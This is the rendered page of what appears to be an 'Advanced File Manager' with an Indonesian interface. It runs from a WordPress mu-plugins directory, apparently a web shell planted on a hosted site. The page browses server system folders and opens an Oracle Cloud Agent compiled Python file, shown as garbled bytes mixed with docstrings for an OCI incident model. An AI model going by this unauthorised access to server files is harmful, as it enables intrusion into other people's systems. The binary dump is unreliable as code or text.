📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
cims
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/cims/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_incident.pyc
a N��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdd� Ze dd � �Z e jd d � �Z e dd� �Zejd d� �Ze dd� �Z e jdd� �Z e dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Zdd� Zdd� Zdd� Zd S )!�CreateIncidentz� Details gathered during the creation of the support ticket. **Caution:** Avoid using any confidential information when you supply string values using the API. �LIMIT�LEGACY_LIMIT�TECH�ACCOUNTc K sP ddddddd�| _ ddddd d d�| _d| _d| _d| _d| _d| _d| _dS )a� Initializes a new CreateIncident object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param compartment_id: The value to assign to the compartment_id property of this CreateIncident. :type compartment_id: str :param ticket: The value to assign to the ticket property of this CreateIncident. :type ticket: oci.cims.models.CreateTicketDetails :param csi: The value to assign to the csi property of this CreateIncident. :type csi: str :param problem_type: The value to assign to the problem_type property of this CreateIncident. Allowed values for this property are: "LIMIT", "LEGACY_LIMIT", "TECH", "ACCOUNT" :type problem_type: str :param contacts: The value to assign to the contacts property of this CreateIncident. :type contacts: list[oci.cims.models.Contact] :param referrer: The value to assign to the referrer property of this CreateIncident. :type referrer: str �str�CreateTicketDetailsz list[Contact])�compartment_id�ticket�csi�problem_type�contacts�referrer� compartmentIdr r �problemTyper r N)� swagger_types� attribute_map�_compartment_id�_ticket�_csi� _problem_type� _contacts� _referrer)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/cims/models/create_incident.py�__init__"